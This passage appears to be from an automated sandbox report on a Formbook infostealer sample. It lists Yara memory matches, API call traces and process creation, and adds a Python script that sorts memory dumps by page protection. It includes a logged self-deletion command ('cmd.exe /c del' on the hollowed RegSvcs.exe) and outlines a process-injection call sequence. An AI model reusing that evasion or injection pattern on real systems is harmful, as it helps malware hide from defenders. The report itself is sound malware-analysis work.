Source: 00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
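The Yara hits in the E-Banking Fraud list and in the two System Summary lists above are the same ten memory dumps, and the dump names themselves carry the triage information: which process the match is in and whether the region was executable. The following script is an added example written for this page, not tooling from the sandbox vendor: it decodes the dump identifiers copied from the lists above. The field layout it assumes (process index in hex, phase, dump id, base address, page protection, region type) is this example's reading of the names, not a documented format; the protection field is interpreted with the standard Windows PAGE_* constants, which the observed values 0x40 (PAGE_EXECUTE_READWRITE) and 0x04 (PAGE_READWRITE) fit. The process-name mapping uses only indexes this report names (1 = TPJX2QwEdXs5sTV.exe, 6 = RegSvcs.exe, 0x17 = 23 = cmd.exe); index 8 is not named in this section and is left as a number.

```python
import re

# Dump identifiers copied from the Yara match lists above.
YARA_MATCHES = [
    "00000008.00000000.342627286.000000000E077000.00000040.00020000.sdmp",
    "00000017.00000002.514970004.0000000002D90000.00000040.00020000.sdmp",
    "00000006.00000002.390262569.00000000009D0000.00000040.00020000.sdmp",
    "00000017.00000002.512368731.0000000000940000.00000004.00000001.sdmp",
    "00000008.00000000.321761934.000000000E077000.00000040.00020000.sdmp",
    "00000006.00000002.389976608.0000000000400000.00000040.00000001.sdmp",
    "00000017.00000002.513972990.00000000029D0000.00000040.00020000.sdmp",
    "00000001.00000002.282361714.0000000003FA9000.00000004.00000001.sdmp",
    "00000006.00000002.390330954.0000000000A20000.00000040.00020000.sdmp",
    "00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmp",
]

# Process indexes named in this report: hex in dump names, decimal in the
# "Code function" lines (0x17 == 23 is cmd.exe). Index 8 is not named here.
PROCESS_NAMES = {1: "TPJX2QwEdXs5sTV.exe", 6: "RegSvcs.exe", 23: "cmd.exe"}

# Standard Windows PAGE_* protection constants; any of the high nibble bits
# means the region is executable.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE_MASK = 0xF0

# Assumed field layout (see the lead-in); not a documented format.
_DUMP_RE = re.compile(
    r"^(?P<proc>[0-9A-Fa-f]{8})\.(?P<phase>[0-9A-Fa-f]{8})\.(?P<dump_id>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<protect>[0-9A-Fa-f]{8})\.(?P<type>[0-9A-Fa-f]{8})\.sdmp$"
)


def decode_dump(name):
    """Decode one memory-dump identifier into its assumed fields."""
    m = _DUMP_RE.match(name)
    if not m:
        raise ValueError(f"not a dump identifier: {name}")
    proc = int(m["proc"], 16)
    protect = int(m["protect"], 16)
    return {
        "proc": proc,
        "proc_name": PROCESS_NAMES.get(proc, f"process-index-{proc}"),
        "phase": int(m["phase"], 16),
        "dump_id": int(m["dump_id"]),
        "base": int(m["base"], 16),
        "protect": protect,
        "protect_name": PAGE_PROTECTION.get(protect & 0xFF, f"0x{protect:X}"),
        "executable": bool(protect & EXECUTABLE_MASK),
        "region_type": int(m["type"], 16),
    }


def triage(names):
    """Per process, split Yara hits into executable regions (payload running
    or staged to run) and plain read/write regions (payload held as data).
    Base addresses are de-duplicated and sorted."""
    out = {}
    for name in names:
        d = decode_dump(name)
        bucket = out.setdefault(d["proc"], {"exec": set(), "rw": set()})
        bucket["exec" if d["executable"] else "rw"].add(d["base"])
    return {p: {k: sorted(v) for k, v in b.items()} for p, b in out.items()}


def processes_hosting_executable_payload(names):
    """Process indexes in which the payload was found in executable memory."""
    return sorted(p for p, b in triage(names).items() if b["exec"])


if __name__ == "__main__":
    for proc, buckets in sorted(triage(YARA_MATCHES).items()):
        name = PROCESS_NAMES.get(proc, f"process-index-{proc}")
        print(f"{name}: executable={[hex(a) for a in buckets['exec']]} "
              f"read-write={[hex(a) for a in buckets['rw']]}")
```

The split the script produces is the point: in the original TPJX2QwEdXs5sTV.exe process (index 1) the payload is only ever found in read/write regions, i.e. as data inside the .NET loader, while in RegSvcs.exe (including its hollowed image base 0x400000), in process 8 and in cmd.exe it sits in PAGE_EXECUTE_READWRITE memory. When reproducing the analysis, those RWX regions are the ones to dump and carve, not the loader's heap copies.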
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA2068
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA4190
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA28D0
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA28CE
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA2059
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA2510
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA6D08
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA2501
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA2ACF
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA0388
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA037A
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_04FA2B0F
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_054CE5CA
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_054CE5D8
Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe | Code function: 1_2_054CBC34
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00401027
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00401030
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041C94A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041BB99
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00408C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00402D90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041A6AA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00402FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F7B090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01021002
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F84120
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F6F900
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F9EBB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_01031D55
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F60D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00F86E30
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_008748E6
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00895CEA
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00879CF0
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0087D803
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0087E040
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00877190
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_008931DC
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00893506
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00886550
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00881969
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00878AD7
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00875226
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0087FA30
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00875E70
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00885FC8
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00896FF0
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0087CB48
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035DEBB0
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035C6E30
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03671D55
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035AF900
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035A0D20
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035C4120
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035BD5E0
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035B841F
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_03661002
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035BB090
Source: C:\Windows\SysWOW64\cmd.exe | Code function: String function: 035AB150 appears 32 times
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0088374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_004185C0 NtCreateFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00418670 NtReadFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_004186F0 NtClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_004187A0 NtAllocateVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_0041866C NtReadFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_004186EA NtClose,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA98F0 NtReadVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9A20 NtResumeThread,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9A00 NtProtectVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA95D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9660 NtAllocateVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA97A0 NtUnmapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA98A0 NtWriteVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FAB040 NtSuspendThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9820 NtEnumerateKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA99D0 NtCreateProcessEx,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9950 NtQueueApcThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9A80 NtOpenDirectoryObject,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9A10 NtQuerySection,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FAA3B0 NtGetContextThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9B00 NtSetValueKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA95F0 NtQueryInformationFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9560 NtWriteFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FAAD30 NtSetContextThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9520 NtWaitForSingleObject,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA96D0 NtCreateKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9670 NtQueryInformationProcess,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9650 NtQueryValueKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9610 NtEnumerateValueKey,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9770 NtSetInformationFile,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FAA770 NtOpenThread,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9760 NtOpenProcess,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FA9730 NtQueryVirtualMemory,
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 6_2_00FAA710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_008758A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_008784BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0087B4C0 NtQueryInformationToken,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0087B4F8 NtQueryInformationToken,NtQueryInformationToken,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0087B42E NtOpenThreadToken,NtOpenProcessToken,NtClose,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00896D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_0089B5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_00899AB4 NtSetInformationFile,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_008783F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E9710 NtQueryInformationToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E9FE0 NtCreateMutant,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E9780 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E9A50 NtCreateFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E96D0 NtCreateKey,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E96E0 NtFreeVirtualMemory,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E9540 NtReadFile,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E95D0 NtClose,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E99A0 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E9840 NtDelayExecution,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E9860 NtQuerySystemInformation,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E9770 NtSetInformationFile,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035EA770 NtOpenThread,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E9760 NtOpenProcess,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035EA710 NtOpenProcessToken,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E9B00 NtSetValueKey,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E9730 NtQueryVirtualMemory,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035EA3B0 NtGetContextThread,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E97A0 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E9650 NtQueryValueKey,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E9670 NtQueryInformationProcess,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E9660 NtAllocateVirtualMemory,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E9610 NtEnumerateValueKey,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E9A10 NtQuerySection,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E9A00 NtProtectVirtualMemory,
Source: C:\Windows\SysWOW64\cmd.exe | Code function: 23_2_035E9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035EAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035EB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_035E98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_00886550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000000.242394304.0000000000D72000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameBINDOP.exeh$ vs TPJX2QwEdXs5sTV.exe
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.280628910.0000000001448000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs TPJX2QwEdXs5sTV.exe
          Source: TPJX2QwEdXs5sTV.exe, 00000001.00000002.282500066.000000000409E000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameCF_Secretaria.dll< vs TPJX2QwEdXs5sTV.exe
          Source: TPJX2QwEdXs5sTV.exeBinary or memory string: OriginalFilenameBINDOP.exeh$ vs TPJX2QwEdXs5sTV.exe
          Source: TPJX2QwEdXs5sTV.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: TPJX2QwEdXs5sTV.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: TPJX2QwEdXs5sTV.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: TPJX2QwEdXs5sTV.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: TPJX2QwEdXs5sTV.exeReversingLabs: Detection: 17%
          Source: TPJX2QwEdXs5sTV.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: unknownProcess created: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe 'C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exe'
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe'
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TPJX2QwEdXs5sTV.exe.logJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@10/1@7/3
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0089A0D2 memset,GetDiskFreeSpaceExW,??_V@YAXPAX@Z,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 23_2_0087C5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,
          Source: C:\Users\user\Desktop\TPJX2QwEdXs5sTV.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
